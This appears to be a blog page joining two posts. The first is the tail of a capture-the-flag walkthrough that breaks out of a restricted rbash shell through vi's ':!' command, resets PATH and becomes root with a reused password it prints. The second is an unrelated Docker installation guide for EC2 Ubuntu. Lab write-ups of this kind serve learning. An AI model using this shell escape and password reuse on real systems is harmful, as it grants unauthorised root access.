But don’t worry, there is always a solution. Lets use **export **command to export all the child processes running in current shell.

$ export

Here, we can see that our shell is /bin/rbash which is restricted bash shell. Also if you see the path environment varible, it is /home/guest/prog

Lets explore the path env variable, we see that we can use echo command. And also know that by doing echo /*we can check available programs and files.

So I tried with echo /home/guest/* and found prog directory when explored further then resulted in the following.

$ echo /home/guest/prog/*

So now we know that we have vi vim editor available to use. We know that we can spawn a shell using popular and powerfull editors which allow command exec.

In Vi, while saving or quiting a file using vi, we pass some commands like :! or :wq!

and we know in order to change shell we just need to type /bin/bash

so lets open a file in vi and try exiting it with following /bin/bash command.

In above image, I am quiting :! file following /bin/bash

Now when you do ls, you will see you can. So we have esclated the restricted shell rbash. Now we can executed commands we want. So lets finally look what we have here.

Lets try to switch the user to root using sudo su or su, you will see error command not found. Lets get over this by changing the environment path.

We can change the Path env variable suing export command

export PATH=/usr/bin:/bin/

It will work, just copy and paste above command and check path variable using export command.

Now we can switch user.

Use the same password which we used for guest account. It worked for me. (k1ll0r7n)

R00T OWNED

Now in root directory, you will find your flag.

Docker Installation

Docker | Install | EC2 Ubuntu Docker Install

How to install Docker | Adding local user to EC2 ubuntu Instance | Adding user to Sudoers file


Docker

An open-source project that automates the deployment of software applications inside containers by providing an additional layer of abstraction and automation of OS-level virtualization on Linux.

In simple, Docker is a tool that allows developers, sys-admins etc. to deploy applications in a sandbox (which in docker world we call it containers) to run over the host operating system.

For more information, read Docker Docs

Pre-requisites
* Ubuntu 18.04+ / AWS EC2 Ubuntu Instance

If you are on EC2 ubuntu Instance then lets first create a local user and add SSH priveleges to it and in order to get rid of use of user password again and again. We will also add that user to sudoers group. If you are not on AWS EC2 then ignore and continue from adding user to Sudoers.

Procedure
  • Login to your EC2 ubuntu instance using your private key.
$ ssh -i "myprivatekey.pem" ubuntu@public-dns.compute.amazonaws.com

Once you are in, lets start with creating a user and assinging priveleges to it. In my case, I am creating user named ninja

$ sudo adduser ninja --disabled-password

In our case we will be using –disabled-password. Using –disabled-password, you can create a account without use of password. If you want to create user with password then follow below command.

$ sudo adduser ninja 

Now lets switch to user ninja,

$ sudo su - ninja

Now its time to add SSH public key to the user account.

  • start with creating a SSH directory
$ mkdir .ssh 
  • Assign owner direcoty, read, write and execute permission(700);
$ chmod 700 .ssh
  • Adding SSH keys to Ninja
$ touch .ssh/authorized_keys
  • Giving permission to authorized_keys Owner read and write permission.
$ chmod 600 .ssh/authorized_keys

Open the authorized_keys using your favorite editor and copy the public key for the key pair into the file auth_keys.

 Remember your key pair which you downloaded while creating instance. Yes I am talking about that key only. Which you used for login to SSH

In order to open you key pair and copy its key. Use below command from your own system where you downloaded your key pair.

$ ssh-keygen -y -f myprivatekey.pem

Copy the key and paste it into authorized_keys file.

Note: You will not able to run nano or vim. So logout from ninja user and first install nano or vim using user named ubuntu. Once installed, switch to user ninja again using below command.

$ sudo su - ninja

Now paste your key which you will get after using the ssh-keygen command.

The key will look something like given in below image.

Copy it and paste under .ssh/authorized_keys

Use nano to open authorisez_keys file.

nano .ssh/authorised_keys

If somehow your command $ ssh-keygen -y -f myprivatekey.pem fails. Make sure that you have given proper 400 permission to your private key “myprivatekey.pem” if not given,

$ chmod 400 myprivatekey.pem

Now login using SSH but this time our user name is ninja.

$ ssh -i "myprivatekey.pem" ninja@public-dns.compute.amazonaws.com

Adding User ninja to sudoers group
  • Login to your EC2 ubuntu instance with default user ubuntu.

  • Now in order to add ninja to sudoers, follow below steps

$ sudo nano /etc/sudoers

I have highlighted User privilege specification

  • Add ninja ALL=(ALL) NOPASSWD:ALL just below root ALL=(ALL:ALL) ALL. Follow screenshot for better understanding.

Exit and login again with user ninja, now you will not be asked to enter user password again and again while installing Docker or while performing any other action.

Installing Docker

We will start by first updating existing list of packages.

$ sudo apt update

Now, lets install prerequisite packages so that apt can use packages over HTTPS.

$ sudo apt install apt-transport-https ca-certificates curl software-properties-common

Adding GPG key for the official Docker repository

$ curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -

Now add the Docker repo to APT sources

sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable" && sudo apt update

Inorder to check Docker repo version table and installation candidate, use below command.

$ apt-cache policy docker-ce

Finally, lets install Docker

$ sudo apt install docker-ce

Inorder to check running status of Docker

$ sudo service docker status
Executing Docker commands without **Sudo**:

Typing sudo again and again becomes a problem because all commands in Docker need sudo access. But Docker understands its users and hence they allow users to execute Docker commands without use of sudo. Follow below steps to do so.

$ sudo usermod -aG docker ${USER}

Please reboot your machine inorder for changes to take effect.

You may also declare user mannualy by typing the name of user. For example:

$ sudo usermod -aG docker pankaj